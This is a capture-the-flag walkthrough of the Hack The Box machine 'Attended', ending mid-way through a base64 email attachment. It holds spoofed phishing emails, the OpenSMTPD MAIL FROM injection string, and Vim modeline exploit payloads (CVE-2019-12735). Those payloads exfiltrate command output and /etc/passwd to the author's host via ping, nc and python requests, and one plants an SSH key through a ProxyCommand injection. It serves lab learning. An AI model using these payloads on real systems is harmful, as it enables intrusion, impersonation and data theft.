Hack The Box - Attended Writeup

HTB - Attended

Overview

Descriptive information card about this machine

Short description to include any strange things to be dealt with

Useful Skills and Tools

Useful thing 1

description with generic example

Useful thing 2

https://net2.com/how-to-display-the-contents-of-a-text-file-on-the-terminal-in-linux-ubuntu/

Using Echo

echo “$(<$file_name)”

The parenthesis ( ) are used to return the value of a given expression which in this case, is the contents of file_name .

Enumeration

Nmap scan

I started my enumeration with an nmap scan of 10.10.10.xxx. The options I regularly use are:

`Flag`	Purpose
`-p-`	A shortcut which tells nmap to scan all ports
`-vvv`	Gives very verbose output so I can see the results as they are found, and also includes some information not normally shown
`-sC`	Equivalent to `--script=default` and runs a collection of nmap enumeration scripts against the target
`-sV`	Does a service version scan
`-oA $name`	Saves all three formats (standard, greppable, and XML) of output with a filename of `$name`

┌──(zweilos㉿kali)-[~/htb/attended]
└─$ nmap -sCV -p- -n -Pn -vvv -oA attended 10.10.10.221
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-25 19:03 EDT
Nmap scan report for 10.10.10.221

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 4f:08:48:10:a2:89:3b:bd:4a:c6:81:03:cb:20:04:f5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCajKy5e0I1LZSVQsHWYnkWWs5/jZznYlMik932jxCLnhiH0XfKhQkeakcn2jDoWyXM+5aUWofoMFM0djPtoPxTZnnmuIwncEXGhGDjQvTSaz8Uaba6IWlmcwbCVi+yE5uSM31iWtcfO3fmwa4W45GMD0LDEUvmM18z8beUNUHmuj69xq1/thXiK8Ekm9NhT8pUySMl6b1v6UChF6xCKydudrTkQ2PtW6to/v3wIWAFdr3kP4EzN018S1dsZsep2AXwGObZJghTrrEryAVkNf/fOxcDQo3obhzFll14xd9VcYYnPh1+x+WamJUaPD07/FOgYUghhSpnwlKSuJYpnnFuAzDE2IXqNtWaLMN1ZrG+TFK2X5hnASTu6o24VvH+AzSf1MlaFB/CS2pXRivH6S37ETj7tb6eZh9sXHnxNc9Wm+PaqoteQyru/tvwQUyKgpjhNL/0HXDAOg466iJu8sLzRirBFjJGx549LNSNAJzLEvhstjSNBirOMFLyNHu1wT0=
|   256 1a:41:82:21:9f:07:9d:cd:61:97:e7:fe:96:3a:8f:b0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLM+87aXzxrncG0FY76FeBol0aCzuMS24x87hHAR8AuCUOi0kII0hnVcfSXWA6KhmCJEJ9Uh9AJFhRVWCqe9NSw=
|   256 e0:6e:3d:52:ca:5a:7b:4a:11:cb:94:ef:af:49:07:aa (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMJetBmI2kdgSmPqxFUoM3xm0yeFboNZwDzeGsID4RiD
25/tcp open  smtp    syn-ack
| fingerprint-strings: 
|   GenericLines, GetRequest: 
|     220 proudly setup by guly for attended.htb ESMTP OpenSMTPD
|     5.5.1 Invalid command: Pipelining not supported
|   Hello: 
|     220 proudly setup by guly for attended.htb ESMTP OpenSMTPD
|     5.5.1 Invalid command: EHLO requires domain name
|   Help: 
|     220 proudly setup by guly for attended.htb ESMTP OpenSMTPD
|     214- This is OpenSMTPD
|     214- To report bugs in the implementation, please contact bugs@openbsd.org
|     214- with full details
|     2.0.0: End of HELP info
|   NULL: 
|_    220 proudly setup by guly for attended.htb ESMTP OpenSMTPD
| smtp-commands: proudly setup by guly for attended.htb Hello nmap.scanme.org [10.10.14.172], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP, 
|_ This is OpenSMTPD To report bugs in the implementation, please contact bugs@openbsd.org with full details 2.0.0: End of HELP info 
Nmap done: 1 IP address (1 host up) scanned in 135.62 seconds

This machine only had two ports open, 22- SSH, and 25 - SMTP.

Port 25 SMTP

https://www.hackercoolmagazine.com/smtp-enumeration-with-kali-linux-nmap-and-smtp-user-enum/
https://www.hackingarticles.in/4-ways-smtp-enumeration/

It’s not very often that I have to start right off the bat with some research. I could tell this was going to be a difficult machine.

┌──(zweilos㉿kali)-[~/htb/attended]
└─$ telnet 10.10.10.221 25   
Trying 10.10.10.221...
Connected to 10.10.10.221.
Escape character is '^]'.
220 proudly setup by guly for attended.htb ESMTP OpenSMTPD
HELP
214- This is OpenSMTPD
214- To report bugs in the implementation, please contact bugs@openbsd.org
214- with full details
214 2.0.0: End of HELP info
VRFY root
500 5.5.1 Invalid command: Command unrecognized
VRFY root@attended.htb
500 5.5.1 Invalid command: Command unrecognized

The command I was used to using for verifying users did not work. I did notice the username guly in the output, the hostname attended.htb, and the HELP command reporting that this was an OpenBSD machine. I decided to look up some more information about OpenSMTPD to see if there were different commands to use.

https://www.opensmtpd.org/manual.html

Unfortunately the man page did not have what I wanted, and nothing that I could find showed that there were different commands for interacting with OpenSMPTD. I decided that the admins probably had just disabled the VRFY command for security.

HELO
501 5.5.1 Invalid command: HELO requires domain name
HELO attended.htb
250 proudly setup by guly for attended.htb Hello attended.htb [10.10.14.172], pleased to meet you

I tried connecting again, pretending to be attended.htb and it didnt care. It seemed that this machine did not have SPF enabled and that I might be able to use it as a relay to send mail.

MAIL FROM:<root@attended.htb>          
250 2.0.0: Ok
RCPT TO:<root@attended.htb>
250 2.1.5 Destination address valid: Recipient ok

I found a way to find valid email addresses by simply using the RCPT TO command. My first guess root@attended.htb was a valid email address.

MAIL FROM:<root@attended.htb>          
250 2.0.0: Ok
RCPT TO:<root@attended.htb>
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
Note to self
click this: 
http://10.10.14.172:8090/$whoami
.
550 5.7.1 Delivery not authorized, message refused: Message is not RFC 2822 compliant

I tried typing out an email by hand, but apparently I had to make the email message RFC 2822 compliant to get it to send. L

https://tools.ietf.org/html/rfc2822
https://its.ny.gov/security-advisory/vulnerability-opensmtpd-could
https://nvd.nist.gov/vuln/detail/CVE-2020-8794

msf6 exploit(unix/smtp/opensmtpd_mail_from_rce) > exploit

[*] Started reverse TCP handler on 10.10.14.172:8091 
[*] 10.10.10.221:25 - Executing automatic check (disable AutoCheck to override)
[!] 10.10.10.221:25 - The service is running, but could not be validated.
[*] 10.10.10.221:25 - Connecting to OpenSMTPD
[*] 10.10.10.221:25 - Saying hello and sending exploit
[*] 10.10.10.221:25 - Expecting: /220.*OpenSMTPD/
[*] 10.10.10.221:25 - Sending: HELO eaSQOx740fLw0e2kVH
[*] 10.10.10.221:25 - Expecting: /250.*pleased to meet you/
[*] 10.10.10.221:25 - Sending: MAIL FROM:<;for H in J 0 x F n Z U g y m a j D a;do read H;done;sh;exit 0;>
[*] 10.10.10.221:25 - Expecting: /250.*Ok/
[-] 10.10.10.221:25 - Exploit aborted due to failure: timeout-expired: Pattern not found: /250.*Ok/
[*] Exploit completed, but no session was created.

While researching how to send an email properly I found out that there was a metasploit module referenced for a vulnerability found in 2020,

MAIL FROM:<;for H in J 0 x F n Z U g y m a j D a;do read H;done;sh;exit 0;>
553 5.1.0: Sender address syntax error

Manual testing showed that it didn’t like the syntax of the sender’s address. That vulnerabilty may have been fixed in this version, or something may have blocked the reply.

smtp-user-enum

┌──(zweilos㉿kali)-[~/htb/attended]
└─$ smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -D attended.htb -t 10.10.10.221
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count ............. 1
Username count ........... 168
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ attended.htb

######## Scan started at Sun Apr 25 19:50:32 2021 #########
######## Scan completed at Sun Apr 25 19:50:43 2021 #########
0 results.

168 queries in 11 seconds (15.3 queries / sec)

I tried using the smtp-user-enum tool to enumerate valid user accounts on the machine, but it didn’t seem to be working properly.

Wireshark output showing the invalid SMTP commands being sent

I opened up Wireshark to see if I could troubleshoot. I noticed that the server was telling me that the sender address had a syntax error in it, and that the RCPT TO command wasnt valid because it wasn’t ready to accept that command yet. I noticed that the syntax for the sender and recipt addresses was missing the angle brackets. I wondered if I could fix this.

┌──(zweilos㉿kali)-[~/htb/attended]
└─$ file /usr/bin/smtp-user-enum
/usr/bin/smtp-user-enum: Perl script text executable

I used the file tool to find out what type of file the tool was. A lot of tools are scripts and not ELF executables, as was the case here.

The perl code of the smtp enumeration tool

I found the relevant piece of code and added in the angle brackets around the two email addresses in the RCPT parameter section of code.

┌──(zweilos㉿kali)-[~/htb/attended]
└─$ ./smtp-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -D attended.htb -t 10.10.10.221
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count ............. 1
Username count ........... 168
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ attended.htb

######## Scan started at Sun Apr 25 19:55:26 2021 #########
10.10.10.221: bin@attended.htb exists
10.10.10.221: daemon@attended.htb exists
10.10.10.221: nobody@attended.htb exists
10.10.10.221: operator@attended.htb exists
10.10.10.221: postmaster@attended.htb exists
10.10.10.221: root@attended.htb exists
10.10.10.221: ROOT@attended.htb exists
10.10.10.221: sshd@attended.htb exists
10.10.10.221: www@attended.htb exists
######## Scan completed at Sun Apr 25 19:55:38 2021 #########
9 results.

168 queries in 12 seconds (14.0 queries / sec)

After I fixed the smtp-user-enum tool it worked! I used the same wordlist that the scanner/smtp/smtp_enum metasploit module was supposed to use, and found a short list of usernames to work with. I thought that perhaps I could use this to send a phishing email like I did when doing the Hack the Box machines SneakyMailer or Reel2.

┌──(zweilos㉿kali)-[~/htb/attended]
└─$ ./smtp-enum -M RCPT -U usertest -D attended.htb -t 10.10.10.221
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... usertest
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ attended.htb

######## Scan started at Sun Apr 25 22:03:47 2021 #########
10.10.10.221: guly@attended.htb exists
######## Scan completed at Sun Apr 25 22:03:47 2021 #########
1 results.

1 queries in 1 seconds (1.0 queries / sec)

Since the username guly was in the responses I had gotten from SMTP I added it to my tests and made sure it was also a valid email address. I put all of the valid usernames into a file called users.

Using swaks to send emails

https://zweilosec.github.io/posts/sneakymailer/
https://github.com/jetmore/swaks

for address in $(cat users); do swaks --helo attended.htb \
--to $address --from zweilos@attended.htb --header "Subject: Check this out" \
--body "Check this out\n http://10.10.14.172:8090/" --server 10.10.10.221; done

I used the tool swaks as I had done in SneakyMailer, sending a link to my machine in a phishing email to see what I could get back.

Wireshark output showing my phishing emails were successfully sent

After sending my emails, I checked Wireshark again, and saw that my emails were all successfully sent. I watched my waiting netcat listener to see if I would recieve any responses, but nothing came back.

┌──(zweilos㉿kali)-[~/htb/attended]
└─$ for address in $(cat users); do swaks --helo attended.htb \ 
--to $address --from root@attended.htb --header "Subject: Check this out" \
--body "Check this out\nhttp://10.10.14.172:8090/" --server 10.10.10.221; done

I tried changing up my email address to come from a valid internal email address. I still did not seem to get any response.

Wireshark output showing my machine sending reset packets to all of the SMTP connection requests

After sending numerous tries, I started getting packets from the target machine that tried to connect to my machine’s port 25. My machine did not have the port open so it kept sending reset packets back. It looked like I needed to set up an SMTP server or a listener on port 25.

┌──(zweilos㉿kali)-[~/htb/attended]
└─$ sudo nc -lvnp 25
[sudo] password for zweilos: 
listening on [any] 25 ...
connect to [10.10.14.172] from (UNKNOWN) [10.10.10.221] 1307

My netcat listener on port 25 got a connect back, but there was no data that I could see.

250
EHLO attendedgw.htb

I sent “250” to the machine and got back a reply saying it was attendedgw.htb. Since it was connecting to port 25 I made the assumption that it was SMTP traffic. It stopped sending after that, so I started my netcat listener again to try again. This time I looked at the Wireshark output to look at the proper response codes to send back to it. I sent another mail, spoofing the email address root@attended.htb.

┌──(zweilos㉿kali)-[~/htb/attended]
└─$ sudo nc -lvnp 25 
[sudo] password for zweilos: 
listening on [any] 25 ...
250
250
250
250
354
250
connect to [10.10.14.172] from (UNKNOWN) [10.10.10.221] 43881
EHLO attendedgw.htb
MAIL FROM:<guly@attended.htb>
RCPT TO:<root@[10.10.14.172]>
DATA
Received: from attended.htb (attended.htb [192.168.23.2])
        by attendedgw.htb (Postfix) with ESMTP id 77B7632D5D
        for <root@10.10.14.172>; Mon, 26 Apr 2021 05:07:35 +0200 (CEST)
Content-Type: multipart/alternative;
 boundary="===============2957209377152459646=="
MIME-Version: 1.0
Subject: Re: Check this out
From: guly@attended.htb

--===============2957209377152459646==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

hello, thanks for writing.
i'm currently quite busy working on an issue with freshness and dodging any email from everyone but him. i'll get back in touch as soon as possible.


---
guly

OpenBSD user since 1995
Vim power user

/"\ 
\ /  ASCII Ribbon Campaign
 X   against HTML e-mail
/ \  against proprietary e-mail attachments

--===============2957209377152459646==--
.
QUIT

Who needs an smtp client when you know how to send back valid response codes manually? I typed the responses myself line by line as each line was sent to me. Eventually I got the whole email. I discovered after doing this a few times that you could type the response codes one at a time before the connection came in and they would all get processed at once. This really sped up my wait for each email. After reading the email I got, I could see it was a reply from the user guly. It looks like guly was only responding to emails from his partner, however.

sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25

Note: after watching Ippsec do this box later, I found out you can set up an SMTP server with python too! I wish I had known this while doing this machine.This would have made receiving mail much easier, as you don’t have to restart it after receiving each email!

Phishing for guly

┌──(zweilos㉿kali)-[~/htb/attended]
└─$ for address in $(cat user); do swaks --helo attended.htb --to $address --from freshness@attended.htb --header "Subject: Check this out" \--body "Check this out\nhttp://10.10.14.172:8090/" --server 10.10.10.221; done  
=== Trying 10.10.10.221:25...
=== Connected to 10.10.10.221.
<-  220 proudly setup by guly for attended.htb ESMTP OpenSMTPD
 -> EHLO attended.htb
<-  250-proudly setup by guly for attended.htb Hello attended.htb [10.10.14.172], pleased to meet you
<-  250-8BITMIME
<-  250-ENHANCEDSTATUSCODES
<-  250-SIZE 36700160
<-  250-DSN
<-  250 HELP
 -> MAIL FROM:<freshness@attended.htb>
<-  250 2.0.0: Ok
 -> RCPT TO:<guly@attended.htb>
<-  250 2.1.5 Destination address valid: Recipient ok
 -> DATA
<-  354 Enter mail, end with "." on a line by itself
 -> Date: Mon, 26 Apr 2021 05:05:32 +0200
 -> To: guly@attended.htb
 -> From: freshness@attended.htb
 -> Subject: Check this out
 -> Message-Id: <20210508132631.1653112@kali>
 -> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
 -> 
 -> Check this out
 -> http://10.10.14.172:8090/
 -> 
 -> 
 -> .
<-  250 2.0.0: bde07d85 Message accepted for delivery
 -> QUIT
<-  221 2.0.0: Bye
=== Connection closed with remote host.

Next I sent an email spoofing freshness’s email address to see if he would respond differently.

Subject: Re: Check this out
From: guly@attended.htb

hi mate, could you please double check your attachment? looks like you forgot to actually attach anything :)

p.s.: i also installed a basic py2 env on gw so you can PoC quickly my new outbound traffic restrictions. i think it should stop any non RFC compliant connection.

---
guly

OpenBSD user since 1995
Vim power user

/"\ 
\ /  ASCII Ribbon Campaign
 X   against HTML e-mail
/ \  against proprietary e-mail attachments

I got back an email from guly responding to my email as freshness saying that I forgot to attach a file. It also mentioned that a Python2 enviroment was set up to test some “outbound traffic restrictions”. Apparently guly was also a fan of openbsd and vim, and hated html email and proprietary email attachments. All of these things seemed like hints that could help me craft a way to get onto the machine.

Subject: Re: Check this out
From: guly@attended.htb

hi mate, i'm sorry but i can't read your attachment. could you please remember i'm against proprietary e-mail attachments? :)

---
guly

OpenBSD user since 1995
Vim power user

/"\ 
\ /  ASCII Ribbon Campaign
 X   against HTML e-mail
/ \  against proprietary e-mail attachments

I modified my email to include a shell script that would ping my computer, and got back an email saying that guly couldn’t read my email. Maybe he only accepted python attachments?

#!/usr/bin/python2
import os

os.system('ping -c 10 10.10.14.172')

I tried sending a python script that would ping my machine, but got back the same email as before about not being able to read my attachment.

Subject: Re: Check this out
From: guly@attended.htb

thanks dude, i'm currently out of the office but will SSH into the box immediately and open your attachment with vim to verify its syntax.
if everything is fine, you will find your config file within a few minutes in the /home/shared folder.
test it ASAP and let me know if you still face that weird issue.

---
guly

OpenBSD user since 1995
Vim power user

/"\ 
\ /  ASCII Ribbon Campaign
 X   against HTML e-mail
/ \  against proprietary e-mail attachments

This time I sent a non-existant file, but named the attachment test2.py. It looked as if guly was not in the office, but would open my attachment with vim. It seemed as if I would need to send a payload that would execute when opened in vim. I wondered if it had been the OS command or the shebang that made the attachment not valid in my previous attachment.

#!/usr/bin/python2
print("Hello guly")

Sending this simple python file also got back the “I can’t read your attachment” message.

import os
os.system('ping -c 10 10.10.14.172')

For the next attempt I sent my ping command without the shebang, and got the message about opening my file with vim when he gets back to the office again. It seemed like I didn’t need to specify python2. I still did not get back any pings, however.

https://www.tutorialspoint.com/python/python_sending_email.htm
https://medium.com/@magrabursofily/exploit-poc-linux-command-execution-on-vim-neovim-vulnerability-cve-2019-12735-4c770d5573cf
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=930020
https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md

I did some research on vim exploits using python and found a medium article on CVE-2019-12735 that looked interesting. I did a bit more looking and found a PoC for this on GitHub. It didn’t use python, but I thought I’d give it a try anyway.

:!ping -c 10 10.10.14.172||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

I send the PoC with a command to ping my machine again. I didnt get any pings, but I did get a message saying guly would check out the file when he got home. I wondered how long it would take him to get home… :laugh:

Note: I realized after the next email that I sent that my Wireshark traffic showed that I was 10.10.14.182. Yesterday it had been 10.10.14.172…so close but enough to throw off all my testing!

Remote Code Execution

Wireshark output showing successful ping attempts reaching my machine

I fixed the IP address in my script and got back ICMP echo requests! It was interesting…this time I did not get an email, just the pings. (Maybe I just missed it, got emails from now on…)

:!curl http://10.10.14.182:8090/||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

Next I tried to use curl to connect to my HTTP server, but I didn’t even see the traffic in Wireshark.

:! nc 10.10.14.182 8091 < /etc/passwd ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

next I tried netcat. If this didn’t work then a reverse shell probably wouldn’t either. It didn’t work, with or without the attempt to exfiltrate /etc/passwd. It was looking like ping might be my only choice. I decided to research ICMP tunneling.

Exploring with ping

https://resources.infosecinstitute.com/topic/icmp-reverse-shell/
https://cryptsus.com/blog/icmp-reverse-shell.html
https://curesec.com/blog/article/blog/Exfiltrate-Data-using-the-old-ping-utility-trick-23.html

:!  ping -p DEADBEEF -c 5 10.10.14.182 ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

This time I used ping to specify a pattern to send. I send DEADBEEF as it would be easy to pick out in traffic. (Note: the data needs to be in hex, which is why I chose DEADBEEF.)

The dead beef message in the wireshark output

This time I got an email back, so I assumed it didn’t work, but to my surprise there was ICMP traffic in my Wireshark output. I could clearly see my DEADBEEF message in the hex output. According to this network traffic, the code gets executed roughly the same time as the server starts sending me an email reply. There is a bit of a delay.

:!  ping -p $(echo D34DB33F) -c 5 10.10.14.182 ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

I made a simple modification to my last test. I used an inline command substitution technique to run the command echo D34DB33F and insert that in the pattern to send.

The upgraded dead beef test in wireshark output

I was successful. I now had a way to send myself messages back from the server. Now I had to figure out how to send useful information. I tried figuring out the username by using $(whoami) but nothing came back. I assumed there was an error that killed the whole script from executing.

Code execution with `ping -p` and `xxd -p`

https://linux.die.net/man/8/ping

-p pattern
You may specify up to 16 ''pad'' bytes to fill out the packet you send. This is useful for diagnosing data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones.

From the man page for ping it looked like anything that was send would be sent as bytes. The DEADBEEF messages I sent earlier were interpreted directly as hex. Maybe I could hex encode the result?

https://linux.die.net/man/1/xxd

:!  ping -p $(whoami | xxd -p) -c 5 10.10.14.182 ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

I used xxd -p to encode the result of whoami as a continuous stream of hexidecimal output.

Success! I saw the name guly in the ASCII interpretation of the wireshark output. whoami hadn’t worked by itself, but hex-encoding the result did!

https://serverfault.com/questions/105838/make-ls-print-it-all-on-one-line-like-in-terminal

I decided to take what I had learned to get more data, but I seemed to be very limited by the 16 byte maximum. My tests would fail if the result was longer than that. I tried ls | xargs, uname -a, and id. I decided this was a bit too limiting so I started looking for another option. I looked back through my notes to see if I had missed anything and realized I hadn’t tried to use python combined with this PoC code for Vim yet.

Python code execution with requests

:!  python2 -c "import os;os.system('ping -p $(echo pypy | xxd) -c 5 10.10.14.182')" ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

I tried code execution with os.system() using ping -p again, combining all of things I had tried so far.

Wirshark output showing the pypy text in the ICMP requests

I could clearly see my “pypy” message in the ICMP requests. Since I now had code execution using Python, I wondered if I could get anything other than ICMP through.

python2 -c "import requests;requests.get('http://10.10.14.182/$(whoami)')"

Next, I tried to see if I could use the requests module to get output back, since this could give me better output than through ping’s limitations.

The successful attempt to use whoami through python requests

zweilos@kali:~/htb/attended$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.221 - - [27/Apr/2021 20:46:56] code 404, message File not found
10.10.10.221 - - [27/Apr/2021 20:46:56] "GET /guly HTTP/1.1" 404 -

I was able to see the result of my attempt to execute the whoami command in the HTTP request to my server. I was not able to get traffic to come through on port 8090, but it worked on port 80. It seemed as if there was a firewall of some sort blocking outbound traffic.

:!  python2 -c "import requests;requests.get('http://10.10.14.182/$(id | base64)')" ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

This simply requested the root directory of my http server.

:!  python2 -c "import requests;requests.get('http://10.10.14.182/?test=$(id | base64)')" ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

Wireshark output showing the HTTP request for the parameter test with no base64

The request came back this time, but the base64 was stripped out again. It seemed as if there was also some sort of egress filtering going on.

https://stackoverflow.com/questions/4760215/running-shell-command-and-capturing-the-output
https://nixdoc.net/man-pages/OpenBSD/man1/b64encode.1.html

I did some more research and found that apparently OpenBSD has its own version of the base64 command b64encode. None of the tests I tried using this command worked.

https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/private-content-linux-openssl.html
https://askubuntu.com/questions/178521/how-can-i-decode-a-base64-string-from-the-command-line

While searching I found another way to do base64 using openssl.

:!  python2 -c "import requests;requests.get('http://10.10.14.182/$(id | openssl enc -base64 | tr -- '+=/' '-_~')')" ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

This time I tried the same test, but using the openssl version of base64 encoding instead.

10.10.10.221 - - [27/Apr/2021 21:36:56] "GET /dWlkPTEwMDAoZ3VseSkgZ2lkPTEwMDAoZ3VseSkgZ3JvdXBzPTEwMDAoZ3VseSkK HTTP/1.1" 404 -

This time I got a hit back on my HTTP server that included base64 output!

┌──(zweilos㉿kali)-[~/htb/toolbox]
└─$ echo dWlkPTEwMDAoZ3VseSkgZ2lkPTEwMDAoZ3VseSkgZ3JvdXBzPTEwMDAoZ3VseSkK | base64 -d   
uid=1000(guly) gid=1000(guly) groups=1000(guly)

I now had full command output return. I tried to cat /etc/passwd but failed again.

https://stackoverflow.com/questions/15580144/how-to-concatenate-multiple-lines-of-output-to-one-line

I did a bit of research and found a way to trim off newline characters and put all the output on one line, hoping this would solve the problem.

:!  python2 -c "import requests;requests.get('http://10.10.14.182/$(ls | openssl enc -base64 | tr -- '+=/' '-_~')')" ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

"GET /Z2NoZWNrZXIucHkgbWJveCB0bXAg HTTP/1.1" 404 -

Got a reply back on my HTTP server with base64 encoded data!

┌──(zweilos㉿kali)-[~/htb/toolbox]
└─$ echo Z2NoZWNrZXIucHkgbWJveCB0bXAg | base64 -d                                    
gchecker.py mbox tmp

I got back a listing of files/folders in /home/guly. I wondered what gchecker.py was.

:!  python2 -c "import os;os.system('mkdir /home/guly/test')" ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

created folder in /home/guly, then verified its existence

┌──(zweilos㉿kali)-[~/htb/attended]
└─$ echo Z2NoZWNrZXIucHkgbWJveCB0ZXN0IHRtcCA= | base64 -d
gchecker.py mbox test tmp

I used ls ~/ to verify that the folder I was working in was the home directory.

Wireshark output showing that I got the contents of the tmp folder

┌──(zweilos㉿kali)-[~/htb/attended]
└─$ echo LiAuLiAuY29uZmlnLnN3cAo= | base64 -d
. .. .config.swp

In the ~/tmp folder I found a vim swap file. It looked like this may have been the config file that guly had mentioned in his emails.

Host *
User freshness
ControlMaster auto
ControlPath /tmp/%r@%h:%p
ControlPersist 4h
TCPKeepAlive yes
ServerAliveInterval 60

I discovered the vim swap file was opening a config file in the /home/shared/ folder. This file held the contents of an SSH configuration. I did some research to see if there was a way to execute commands from the SSH config file since I could write here.

https://www.ssh.com/academy/ssh/config

The SSH configuration file option proxycommand definition

Found a promising entry: Proxycommand

https://blog.jverkamp.com/2017/12/18/ssh-config-proxycommand-tricks/

It looked like I can execute arbitrary command using this parameter.

:!echo -en '\nProxyCommand echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH1G9UlrgsDWJKVyU1c/IkrKAUlrAec7hsVoM7x8mWU+ >> /home/freshness/.ssh/authorized_keys\n' >> /home/shared/.config ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

My final script that inserted my public key into /home/freshness/.ssh/authorized_keys.

┌──(zweilos㉿kali)-[~/htb/attended]
└─$ for address in $(cat user); do swaks --helo attended.htb \
--to $address --from freshness@attended.htb --header "Subject: Check this out" \
--body "Check this out\nhttp://10.10.14.172:8090/" --attach test3.py --server 10.10.10.221; done
*** DEPRECATION WARNING: Inferring a filename from the argument to --attach will be removed in the future.  Prefix filenames with '@' instead.
=== Trying 10.10.10.221:25...
=== Connected to 10.10.10.221.
<-  220 proudly setup by guly for attended.htb ESMTP OpenSMTPD
 -> EHLO attended.htb
<-  250-proudly setup by guly for attended.htb Hello attended.htb [10.10.14.156], pleased to meet you
<-  250-8BITMIME
<-  250-ENHANCEDSTATUSCODES
<-  250-SIZE 36700160
<-  250-DSN
<-  250 HELP
 -> MAIL FROM:<freshness@attended.htb>
<-  250 2.0.0: Ok
 -> RCPT TO:<guly@attended.htb>
<-  250 2.1.5 Destination address valid: Recipient ok
 -> DATA
<-  354 Enter mail, end with "." on a line by itself
 -> Date: Thu, 06 May 2021 23:01:48 -0400
 -> To: guly@attended.htb
 -> From: freshness@attended.htb
 -> Subject: Check this out
 -> Message-Id: <20210506230148.1584577@kali>
 -> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
 -> MIME-Version: 1.0
 -> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_1584577"
 -> 
 -> ------=_MIME_BOUNDARY_000_1584577
 -> Content-Type: text/plain
 -> 
 -> Check this out
 -> http://10.10.14.172:8090/
 -> ------=_MIME_BOUNDARY_000_1584577
 -> Content-Type: application/octet-stream; name="test3.py"
 -> Content-Description: test3.py
 -> Content-Disposition: attachment; filename="test3.py"
 -> Content-Transfer-Encoding: BASE64
 -> 
 -> OiFlY2hvIC1lbiAnXG5Qcm94eUNvbW1hbmQgZWNobyBzc2gtcnNhIEFBQUFCM056YUMxeWMyRUFB
 -> QUFEQVFBQkFBQUJnUUNVNGQyZVhVWDBQbDFlZVA2MVlsUnhqeklKMVZPKy9jaUNYbGNzakh5VWJu
 -> WlB4MGp3MG1wdTlSRHpKKzF6OGMzTFdsOWdSVTRxNDVzUzg4QXdlQi9zNnl2OTFsblp0ay9Qa0Vy
 -> bDZld2Q1V2I4NGJiTGN0dXV1NTRkQzB2REo1b09LcHJZRDRRMXJ4dXlKYmJQOVlSRGVteURxRytK
 -> UVgwK3dKaTVoU0ZoWmZYOXhGZTVaRDU5UjJwaGxZVTc4OGUyYWNmSjZSV2dnTmFIY25aTGtFUnZ4
 -> RjU5K2FqSDFVTWd5YjZTTUtPNFhMYnJKZ1p4RU9iUzluNktMK1dLVlB4QmprVVhQblQwL09Ecyth
 -> Ri9oR2lrVUdqM1pWQXIwSTE2eFFmUFU3TldZZjZPSS9PcUFxM0FsUGdKQi9MVUdzWUd5WGVVV0Jr
 -> REliM3FZUkF0cVRZN09yQjJHYmszQ1lMMk5NT1R0djY5UFB2VnlmcjV5RHhNNXNnSHY5dm52MzFu
 -> aFJHaDJ6L1dqcGM0aU8vdk9yeTBFRXlDY1crb040dkU0WE1zVmtMVkRzZUYyS0VaWHV3Tjd3YWNz
